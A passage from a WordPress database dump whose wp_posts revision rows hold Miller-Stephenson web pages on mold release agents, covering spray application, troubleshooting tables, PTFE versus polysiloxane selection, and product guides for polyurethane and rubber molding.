~2-4 psi at the outlet. Nozzle sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (1-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.\r\n<ul>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ul>\r\n</li>\r\n</ol>\r\n<h4 style="text-align: justify;"><span style="font-size: 115%;"><strong><span style="text-decoration: underline;">Re-application</span></strong></span></h4>\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding, it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\nFor further assistance please contact our <span style="text-decoration: underline;"><strong><a href="https://www.miller-stephenson.com/tech-support/">Technical Service Department</a></strong></span>. Miller-Stephenson\'s Mold Release Application Guide was designed to set general guidelines for applicators and molders to follow. Each molding operation is different and modifications to the above mentioned process is likely given the diversity and specialization within this field. Please see our Troubleshooting guide below if your are experiencing any issues using our ReleaSys product line.\r\n<h4 style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 130%;"><strong>Troubleshooting Common Molding Issues</strong></span></span></h4>\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="241"><span style="text-decoration: underline; font-size: 120%;"><strong>Problem</strong></span></td>\r\n<td style="text-align: center;" width="517"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: center;" width="680"><span style="font-size: 120%;"><span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 105%;"><strong>Complete <span style="background-color: #ffffff;">failure </span>to obtain release</strong></span></td>\r\n<td><span style="color: #ff0000;">›</span><span style="font-size: 105%;">Improperly cured ReleaSys</span></td>\r\n<td><span style="font-size: 105%;">• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;"><span style="color: #ff0000;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</span></td>\r\n<td><span style="font-size: 105%;">• Thoroughly clean mold with bead blasting followed by cleaning with a solvent or high pH detergent.  Reapply ReleaSys.</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 105%;"><span style="color: #ff0000;">›</span> Phase-separation of ReleaSys as a result of over agitation or mixing</span></td>\r\n<td><span style="font-size: 105%;">• Examine ReleaSys; If separation occurred replace with fresh material</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between passes.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release and/or small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong>To learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong></li>\r\n 	<li><strong>If you require any further technical or application support please contact our technical staff</strong></li>\r\n</ul>\r\n&nbsp;', 'Mold Release Application Guide - Troubleshooting Guide - ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-11-25 19:12:03', '2016-11-25 19:12:03', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3137, 3, '2016-11-25 19:35:01', '2016-11-25 19:35:01', '<h3>Mold Release Agent: Which is right for you?</h3>\r\nMold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agent are available and which variant would compliment their production method.  There are several distinct release agents categories: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason, manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release agent solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane based release agents. Our company is 100% back-integrated meaning our manufacturing, inventory, and quality are maintained regardless of flucuations in the market.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Dry Film Release Agents</strong></a>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong>[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agents(MS-122 and MS-143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform dry, thin films that exhibit excellent surface adhesion and durability. Miller-Stephenson PTFE release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.\r\n\r\nProduction engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. Our PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">Thermoset polysiloxanes</a> (ReleaSys)</strong>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> <strong><a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a></strong> excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agent, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.\r\n\r\nMiller-Stephenson\'s new <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys product</a></strong> line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For any questions about proper application of our mold release products please view our article which discusses this process</strong></a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n 	<li><strong><a href="https://en.wikipedia.org/wiki/Release_agent">Understanding Release Agents</a></strong></li>\r\n</ul>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-11-25 19:35:01', '2016-11-25 19:35:01', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3138, 3, '2016-11-25 19:36:20', '2016-11-25 19:36:20', '<hr />\r\n\r\n<h1 style="text-align: center;">High Performance, Specialized Polyurethane Mold Release Agents</h1>\r\n<span style="font-size: 105%;">Miller-Stephenson offers the most technologically advanced polyurethane molding release agents solutions, back by over 40 years of research, development and technical expertise.  Our mold release agents are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts.  Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a>.  We offer both water and solvent formulations that are 100% non-flammable, low odor, and low VOC.  Miller-Stephenson\'s specialized Polyurethane mold release agents offer customer the following benefits:</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Superior part release:</span> </strong>Our <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a> product is formulated to maximize releases per applications and optimize part quality.  This means reduced down time and fewer defects, regardless of the polyurethane molding operation.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Minimal Transfer:</strong></span> Our customized polyurethane mold release agents are designed to crosslink forming a robust, durable film on the mold surface which results in minimal transfer to our part. This means any secondary operations, such as painting or gluing are not effected, reducing the need for time-wasting clean-up.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Lower defect rates:</strong></span> Miller-Stephenson\'s formulations are perfectly balanced, provide optimal surface slip, durability, and minimal build-up.  Molded parts are therefore manufactured more consistently and with high efficiency</span></li>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Higher quality parts:</span></strong> Miller-Stephenson has developed specialized formulation to exceed all urethane molding requirements. This results in a product line lower build-up on tooling and less sticky, greasy residues making for higher quality parts and lower rejection rates.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Less downtime / Higher efficiency:</strong></span> ReleaSys was designed to maximize releases per applications and minimize mold fouling, which ultimately leads to less time spend applying mold release agents and less time cleaning up the residue lesser release agents leave behind.</span></li>\r\n 	<li><span style="font-size: 105%;"><strong><span style="text-decoration: underline;">Water-based, no/low VOC emissions, cleaner safer working environments:</span></strong> In regions that have strict VOC regulations and air quality permitting, or if your company require products that are safer and have no odor, Miller-Stephenson has developed a portfolio of products that are<a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"> water-based, low VOC or VOC-free</a>. Not only do these products provide you with a solution to lowering your VOC output, they also provide optimal performance just like the solvent-based products you’re used to.</span></li>\r\n 	<li><span style="font-size: 105%;"><span style="text-decoration: underline;"><strong>Optimized surface finish:</strong></span><strong> </strong>ReleaSys Polyurethane mold release agents are formulated to provide a variety of surface finishes.  From high gloss, matte, or 100% dry we have a specialized formulations to meet your needs. Our solutions can meet your surface finish specifications without the greasy and oily residues left behind by other mold release agents.</span></li>\r\n</ul>\r\n<h2><span style="text-decoration: underline;"><strong><span style="font-size: 105%;">Application Guide for Polyurethane Mold Relea</span>se Agents :</strong></span></h2>\r\n<span style="text-decoration: underline; font-size: 105%;">Rigid Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Automotive and Recreational seating</span></li>\r\n 	<li><span style="font-size: 105%;">Guards and Cushioning equipment</span></li>\r\n 	<li><span style="font-size: 105%;">Sporting and Safety equipment (helment, shoulder pads)</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 105%;">Open Cell Polyurethane (PU) Foam</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Pillows and Mattresses</span></li>\r\n 	<li><span style="font-size: 105%;">Insulation</span></li>\r\n</ul>\r\n<span style="text-decoration: underline; font-size: 105%;">Thermoplastic Resins / Coatings</span>\r\n<ul>\r\n 	<li><span style="font-size: 105%;">Bowling pins</span></li>\r\n 	<li><span style="font-size: 105%;">Golf carts</span></li>\r\n 	<li><span style="font-size: 105%;">Automotive Dashboards</span></li>\r\n</ul>\r\n<h1><strong><span style="text-decoration: underline;">Selection Guide:</span></strong></h1>\r\n<table style="height: 284px;" width="769">\r\n<tbody>\r\n<tr>\r\n<td width="105">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Product</strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Carrier Solvent </strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="136">\r\n<h3><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Finish </strong></span></span></h3>\r\n</td>\r\n<td width="135">\r\n<h3 style="text-align: center;"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 110%;"><strong>Description</strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/composite-mold-release-agent/">ReleaSys 8800</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;"> Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Rapid Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/">ReleaSys 8500</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 120%;">Matte</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Immediate Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 140%; color: #0000ff;"><strong><a style="color: #0000ff;" href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">ReleaSys 8900</a></strong></span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 120%;">Matte - Satin</span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">Fast Dry and Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%; color: #000000;">High Durability</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For any questions about proper application of our mold release products please view our article which discusses this process</strong></a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'Polyurethane Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2869-revision-v1', '', '', '2016-11-25 19:36:20', '2016-11-25 19:36:20', '', 2869, 'https://www.miller-stephenson.com/2869-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3139, 3, '2016-11-25 19:37:32', '2016-11-25 19:37:32', '<h1 style="text-align: justify;"><strong>Pioneering Rubber Mold Release Agents &amp; Silicone Mold Release Agents</strong></h1>\r\nSporting goods, machinery, office equipment, automotive tires, footwear and many other industrial products take advantage of the flexibility and robustness of rubber and silicone to solve complex mechanical issues.  As such, the molds to form these shapes and the requirements placed upon mold release agents have increased tremendously. In response, Miller-Stephenson has developed the most advanced rubber mold release agents and silicone mold release agents to meet and exceed all performance requirements in today\'s toughest molding challenges. For solutions to your rubber and silicone mold release problems you can rely on the <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson\'s flagship mold release line, <strong>ReleaSys</strong></a>™, and our worldwide reputation for unsurpassed expertise, consistent quality, and value. With products for both solvent based and water based applications, the ReleaSys line of mold release agents contribute to ensure efficient, cost effective, and high quality release of your molded parts.\r\n\r\nReleaSys Rubber Mold Release agents are recommended for releasing all natural and synthetic rubbers / elastomer compounds. Our release agents chemically bond to mold surfaces ensuring the highest number of releases per application with minimal transfer and no mold fouling. Our specialized release agents eliminate rubber to metal bonding failures resulting in dramatically lower scrap rates. ReleaSys™ Silicone Mold Release agents offer superior durability, maximized surface adhesion and ease of release.\r\n<h2><span style="text-decoration: underline;"><strong>Low or No VOC, Minimal Odor, 100% Non-Flammable</strong></span></h2>\r\nOur ReleaSys™ mold release products, include <strong>solvent based</strong> and <a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong>water based</strong></a> mold release agents for general rubber goods, rubber-to-metal bonding, and silicones elastomers. Our solvent-based products utilize ultra low odor, low VOC and 100% non-flammable formulations dramatically reducing operator safety hazards and minimizing exposure. Water-based formulations are 100% VOC-free and yield the same reliable performance in a more environmentally friendly formulation.  Our water-based formulations are particular effective on technical rubber (ie: Neoprene, Nitrile) and silicone elastomer products, providing instantaneous cure and maximized durability.\r\n<h1>Application Guide For Rubber Mold Release Agents &amp; Silicone Mold Release Agents</h1>\r\n<table style="height: 1010px;" width="829">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Molding Substrate</span></span></td>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Application</span></span></td>\r\n<td style="text-align: center;" width="153"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Carrier Solvent </span></span></td>\r\n<td style="text-align: center;" width="144"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Product</span></span></td>\r\n<td style="text-align: center;" width="179"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Description</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High-Temperature</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Low Mold Building</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8500</span></strong></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Instantaneous Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">High Flow Injection Molding</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal Rejection Rate</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No 